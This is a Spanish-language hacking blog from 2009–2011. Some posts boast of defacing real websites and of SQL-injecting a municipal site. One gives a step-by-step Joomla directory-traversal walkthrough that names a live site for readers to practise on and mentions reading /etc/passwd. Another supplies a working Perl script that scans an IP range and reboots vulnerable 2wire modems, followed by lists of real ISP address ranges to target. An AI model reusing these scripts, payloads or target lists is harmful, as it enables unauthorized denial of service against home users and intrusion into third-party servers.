Hola que tal solo aqui dejando este nuevo sitio en el cual puedes encontrar cursos, asesorias, y un programa de radio online llama plug&play muy bueno, se los dejo.
http://nci.vzpla.net/
jueves, 17 de marzo de 2011
martes, 29 de diciembre de 2009
h4ck3d comic-ar
Hola de nuevo esta ves solo enseñandoles un bonito deface del sitio web comic-ar,dar clic, como muchas veces este admin no respondio a msj chala chala por esa razon aqui les dejo el deface.
Y recuerden es mejor prevenir que lamentar asi que estudienle o vayan con un asesor de seguridad informatica.
Fijense bien en la url y espero y con esta advertencia el admin solucione el problema en caso de que no, posteare un tutorial de como defacearlo.
A petición de algunos escépticos volvi a defacearla y tambien por que lo unico que hizo el admin fue colocar de nuevo el index por que no entenderan por las buenas, aqui les dejo la imagen, ha y por ultimo no esperen que la pagina este defaceada durante mucho tiempo por ello la razon de las imagenes.
Y recuerden es mejor prevenir que lamentar asi que estudienle o vayan con un asesor de seguridad informatica.
Fijense bien en la url y espero y con esta advertencia el admin solucione el problema en caso de que no, posteare un tutorial de como defacearlo.
A petición de algunos escépticos volvi a defacearla y tambien por que lo unico que hizo el admin fue colocar de nuevo el index por que no entenderan por las buenas, aqui les dejo la imagen, ha y por ultimo no esperen que la pagina este defaceada durante mucho tiempo por ello la razon de las imagenes.
miércoles, 16 de diciembre de 2009
Joomla Directory Transversal
joomla directory transversal
Esta vulnerabilidad esta confirmada en la version 1.5.8 pero otras vesiones tambien podrian ser vulnerables, esto sucede por la entrada de la cabecera http "X_CMS_LIBRARY_PATH" manipulando "plugins/editors/xstandard/attachmentlibrary.php" y no verifica adecuadamente antes de ser utilizado. Esto puede ser explotado para mostrar contenido de un directorio arbitrario a través de ataques transversales de directorio o bien dicho de otra forma podemos ver archivos y directorios del servidor en donde esta alojado este sitio web.
Lo primero que se tiene que hacer es escanear un sitio web realizado en joomla, esto lo podemos hacer con el joomscan la cual la pueden descargar de esta direccion:
http://sourceforge.net/projects/joomscan/, una ves descargada nos dirigimos a esta carpeta con una consola ya sea en windows o en linux asta llegar en la carpeta donde se encuentra el joomscan.pl (se necesita tener instalado perl).
Para utilizar esta herramienta como muchas otras puden obtener la ayuda colocando joomscan.pl -h
Para realizar el escaneo se hace de la siguiente forma "joomscan.pl -pv -u victima.com" y empezara a escanear el website.
Para saber si es vulnerable a esta tecnica debe de aparecer el siguiente mensaje:
En donde nos esta diciendo que si es vulnerable, nos dice la ruta de la pagina php vulnerable y nos dice asta la forma de explotar esta vulnerabilidad.
Bueno para explotar esta vulnerabilidad se requiere de otra herramienta llamada modify headers es un complemento de firefox lo pueden descargar facilmente esta herramienta sirve para agregar, modificar o filtrar cabeceras http, entonces nos dirigimos en el navegador a la ruta que dice en "check:" y en realidad nos aparecera el contenido de un xml:
Despues abrimos modify headers y lo que se va hacer
es agregar una cabecera llamada "X_CMS_LIBRARY_PATH" con el valor "../" y nos va ir mostrando los directorios y archivos almacenados en el servidor:
http://www.imagechicken.com/uploads/1260602653052523600.jpg
si quieren seguir subiendo pueden ir agregando en el valor "../../" y de esta forma se puede ir navegando en el server, tambien se podria ver el archivo "../../../etc/passwd" el numero de "../" depende de la estructura del server y si se encuentra passwd XD.
Como puden ver esta tecnica es algo laboriosa y se necesita tener conocimientos de como utilizar exploits o herramientas por medio de la consola y conocimientos de cabeceras http, pero pues no deja de ser otra opcion de kakear xD servidores web.
En este caso se realizo con el sitio web www.urbeconomica.com y pueden practicar con ese.
Asta la proxima.
Cualquier duda, sugerencia, reclamo o comentario favor escribirlo.
by Cr4fT1g4C
Esta vulnerabilidad esta confirmada en la version 1.5.8 pero otras vesiones tambien podrian ser vulnerables, esto sucede por la entrada de la cabecera http "X_CMS_LIBRARY_PATH" manipulando "plugins/editors/xstandard/attachmentlibrary.php" y no verifica adecuadamente antes de ser utilizado. Esto puede ser explotado para mostrar contenido de un directorio arbitrario a través de ataques transversales de directorio o bien dicho de otra forma podemos ver archivos y directorios del servidor en donde esta alojado este sitio web.
Lo primero que se tiene que hacer es escanear un sitio web realizado en joomla, esto lo podemos hacer con el joomscan la cual la pueden descargar de esta direccion:
http://sourceforge.net/projects/joomscan/, una ves descargada nos dirigimos a esta carpeta con una consola ya sea en windows o en linux asta llegar en la carpeta donde se encuentra el joomscan.pl (se necesita tener instalado perl).
Para utilizar esta herramienta como muchas otras puden obtener la ayuda colocando joomscan.pl -h
Para realizar el escaneo se hace de la siguiente forma "joomscan.pl -pv -u victima.com" y empezara a escanear el website.
Para saber si es vulnerable a esta tecnica debe de aparecer el siguiente mensaje:
En donde nos esta diciendo que si es vulnerable, nos dice la ruta de la pagina php vulnerable y nos dice asta la forma de explotar esta vulnerabilidad.
Bueno para explotar esta vulnerabilidad se requiere de otra herramienta llamada modify headers es un complemento de firefox lo pueden descargar facilmente esta herramienta sirve para agregar, modificar o filtrar cabeceras http, entonces nos dirigimos en el navegador a la ruta que dice en "check:" y en realidad nos aparecera el contenido de un xml:
Despues abrimos modify headers y lo que se va hacer
es agregar una cabecera llamada "X_CMS_LIBRARY_PATH" con el valor "../" y nos va ir mostrando los directorios y archivos almacenados en el servidor:
http://www.imagechicken.com/uploads/1260602653052523600.jpgsi quieren seguir subiendo pueden ir agregando en el valor "../../" y de esta forma se puede ir navegando en el server, tambien se podria ver el archivo "../../../etc/passwd" el numero de "../" depende de la estructura del server y si se encuentra passwd XD.
Como puden ver esta tecnica es algo laboriosa y se necesita tener conocimientos de como utilizar exploits o herramientas por medio de la consola y conocimientos de cabeceras http, pero pues no deja de ser otra opcion de kakear xD servidores web.
En este caso se realizo con el sitio web www.urbeconomica.com y pueden practicar con ese.
Asta la proxima.
Cualquier duda, sugerencia, reclamo o comentario favor escribirlo.
by Cr4fT1g4C
jueves, 3 de diciembre de 2009
WEB SITE COLEGIO PATERSON H4CK3D
Esta ves les muestro una sitio web hackeado dicho sitio web es de méxico, realmente estoy en contra de el deface o modificar los sitios web pero hay ocaciones en los que los administradores de red son tan estupidos que aunque les avices no hacen nada, ya que eso me toco a mi.
La semana pasada le hice sql injection al sitio web de chimalhuacan en cuanto vi que era vulnerable me puse en contacto con el web master le mande como 5 msj diciendole que estaba mal su sitio y trate de explicarle pero no me entendio todavia asta le hice un manual de como correjirlo y nada y la verdad lo note un poco esceptico en cuanto a esto asta la fecha sigue vulnerable su sitio.
Entonces por más que haya personas buenas que quieran ayudar con personas como este tipo es inutil.
Asi que si son web master alguno de ustedes no les vendria mal documentarse un poco sobre la seguridad.
Saludos.
La semana pasada le hice sql injection al sitio web de chimalhuacan en cuanto vi que era vulnerable me puse en contacto con el web master le mande como 5 msj diciendole que estaba mal su sitio y trate de explicarle pero no me entendio todavia asta le hice un manual de como correjirlo y nada y la verdad lo note un poco esceptico en cuanto a esto asta la fecha sigue vulnerable su sitio.
Entonces por más que haya personas buenas que quieran ayudar con personas como este tipo es inutil.
Asi que si son web master alguno de ustedes no les vendria mal documentarse un poco sobre la seguridad.
Saludos.
jueves, 26 de noviembre de 2009
miércoles, 25 de noviembre de 2009
NCI (Nuevo Concepto Informatico)
Empresa NCI dedicada a asesoria de TI y Seguridad Informatica para pequeñas y medianas empresas.
Por favor lee lo siguiente, para poder verlo mejor da clic en la imagen.
Por favor lee lo siguiente, para poder verlo mejor da clic en la imagen.
martes, 17 de noviembre de 2009
Seguridad y Redes - Analisis forense: la CSI de la informática
Ponencia Seguridad y Redes - Analisis forense: la CSI de la informática la cual considero la mejor de Campus-Party.
domingo, 8 de noviembre de 2009
Proyecto Natal
'Proyecto Natal' es el nombre en clave de una nueva y revolucionaria forma de jugar en tu Xbox 360..
Pero mejor checalo por ti mismo:
fuente:http://www.xbox.com/es-ES/news-features/news/Project-Natal-in-detail-050609.htm
Pero mejor checalo por ti mismo:
fuente:http://www.xbox.com/es-ES/news-features/news/Project-Natal-in-detail-050609.htm
sábado, 7 de noviembre de 2009
Exploit DoS 2wire https 5001
Bueno amigos aqui les dejo este nuevo exploit el cual reinicia todos los 2wire vulnerables dentro de un rango de IPs...
Les dejo el codigo fuente esta elaborada en perl y un video demostrativo.
Espero les guste:
use LWP::UserAgent;
use Net::Ping;
print "****************************************************\n";
print "**** 2wire Remote DoS HTTPS and 50001 ****\n";
print "**** Cr4fT1g4C ****\n";
print "**** http://cr4ft1g4c-s3cur1ty.blogspot.com/ ****\n";
print "**** ejemplo rango ip: 189.189.189 ****\n";
print "****************************************************\n";
print "inserta_rango_ip:";
$var =;
chop ($var);
$var1 = 1;
$p = Net::Ping->new();
while ($var1<=254){
$var2 = ($var.".".$var1);
if ($p->ping($var2, 2)){
print "El 2wire $var2 responde\n";
$url = "https://$var2:50001/xslt?page=%0d%0a";
$ua = LWP::UserAgent->new;
close ($url);
$ua->get( $url);
close ($url);
print "El 2wire $var2 REINICIADO\n" unless $p->ping($var2);
print "El 2wire $var2 no vulnerable\n" if $p->ping($var2);
$p->close();
}
else{print "El 2wire $var2 no responde \n"}
$var1++;
}
print "ESCANEO REALIZADO";
Les dejo el codigo fuente esta elaborada en perl y un video demostrativo.
Espero les guste:
use LWP::UserAgent;
use Net::Ping;
print "****************************************************\n";
print "**** 2wire Remote DoS HTTPS and 50001 ****\n";
print "**** Cr4fT1g4C ****\n";
print "**** http://cr4ft1g4c-s3cur1ty.blogspot.com/ ****\n";
print "**** ejemplo rango ip: 189.189.189 ****\n";
print "****************************************************\n";
print "inserta_rango_ip:";
$var =
chop ($var);
$var1 = 1;
$p = Net::Ping->new();
while ($var1<=254){
$var2 = ($var.".".$var1);
if ($p->ping($var2, 2)){
print "El 2wire $var2 responde\n";
$url = "https://$var2:50001/xslt?page=%0d%0a";
$ua = LWP::UserAgent->new;
close ($url);
$ua->get( $url);
close ($url);
print "El 2wire $var2 REINICIADO\n" unless $p->ping($var2);
print "El 2wire $var2 no vulnerable\n" if $p->ping($var2);
$p->close();
}
else{print "El 2wire $var2 no responde \n"}
$var1++;
}
print "ESCANEO REALIZADO";
viernes, 23 de octubre de 2009
2wire DoS IPs para probar
Bueno siguiendo con la vulnerabilidad DoS del 2wire les dejo esta vez
unas cuantas direcciones ip con las cuales pueden probar
minimo unas 100 de 255 son vulnerables como minimo.
189.170.123.x
189.171.123.x
189.174.123.x
189.177.123.x
189.178.123.x
Hay muchisimas mas tan solo en el nombre de host debe de tener
dsl-xxx-xxx-xxx-xxx-dyn.prod-infinitum.com.mx
unas cuantas direcciones ip con las cuales pueden probar
minimo unas 100 de 255 son vulnerables como minimo.
189.170.123.x
189.171.123.x
189.174.123.x
189.177.123.x
189.178.123.x
Hay muchisimas mas tan solo en el nombre de host debe de tener
dsl-xxx-xxx-xxx-xxx-dyn.prod-infinitum.com.mx
miércoles, 21 de octubre de 2009
2wire DoS por HTTPS
2wire DoS por HTTPS.
Hola soy Cr4fT1g4C y es mi primer post esper les guste.
La antigua y conocida vulnerabilidad de los modems 2wire deinfinitum descubiertos por HKM (http://www.hakim.ws/), en la cual por medio de modificar la URL podriamos hacer que el modem se reinicie.
Dicha vulnerabilidad se suponia que solo se podia realizar si pertenecias a la red interna (LAN) y que el modem 2wire fuera tu gateway.
Un ejemplo:
http://192.168.1.254/xslt?page=%0d%0a
Donde 192.168.1.254 era la direccion de tu modem 2wire.
Bueno pero con este gran descubrimiento de HKM que me ha servido de apoyo, he descubierto que por medio del protocolo https y el puerto 50001 los modems 2wire de infinitum lo utilizan para poder accesar al modem de forma remota, teniendo el user y el pass
Pero por medio de esta conexion https y el puerto 50001 se puede realizarla la misma vulnerabilidad de denegacion de servicio esto nos da una gran ventaja ya que sin necesidad de pertenecer a la LAN como HKM decia podemos realizar este ataque solo agregando a la url los siguientes parametros: protocolo, ip, puerto y xslt?page=%0d&0a, lo cualquedaria de la siguiente forma:
https://ip_victima:50001/xslt?page=%0d%0a
Colocando esta URL, claro la ip debe ser la publica y el modem 2wire debe tener los siguientes Firmware:
5.29.51
3.17.5
3.7.1
Los cuales son vulnerables.Asi que cualquier usuario que tenga esta version de firmware,que tenga habilitado https y el puerto 50001 este abierto sera vulnerable sin necesidad de que el atacante tenga el user y el password y sin necesidad que este dentro de su LAN.
lunes, 7 de septiembre de 2009
AVISO U T N
AVISO a todos aquellos que esten en la carrera de Telematica o Informatica en la famosisima UTN esto les puede servir.
Un grupo de exalumnos estan empezando un equipo llamado CNI (nuevo concepto informatico) el cual tienen como fin ayudar a los alumnos dando todo tipo de asesorias o ayudando en trabajos o proyectos escolares.
De igual forma si consideras que tienes un buen nivel en algunos de los siguientes temas si lo deseas puedes unirte a nosotros.
CCNA
LINUX
WINDOWS
ELECTRONICA
PAGINAS WEB
SOPORTE TECNICO
Para mayores informes favor de contactarnos:
cni_inf@hotmail.com
Un grupo de exalumnos estan empezando un equipo llamado CNI (nuevo concepto informatico) el cual tienen como fin ayudar a los alumnos dando todo tipo de asesorias o ayudando en trabajos o proyectos escolares.
De igual forma si consideras que tienes un buen nivel en algunos de los siguientes temas si lo deseas puedes unirte a nosotros.
CCNA
LINUX
WINDOWS
ELECTRONICA
PAGINAS WEB
SOPORTE TECNICO
Para mayores informes favor de contactarnos:
cni_inf@hotmail.com
Suscribirse a:
Entradas (Atom)
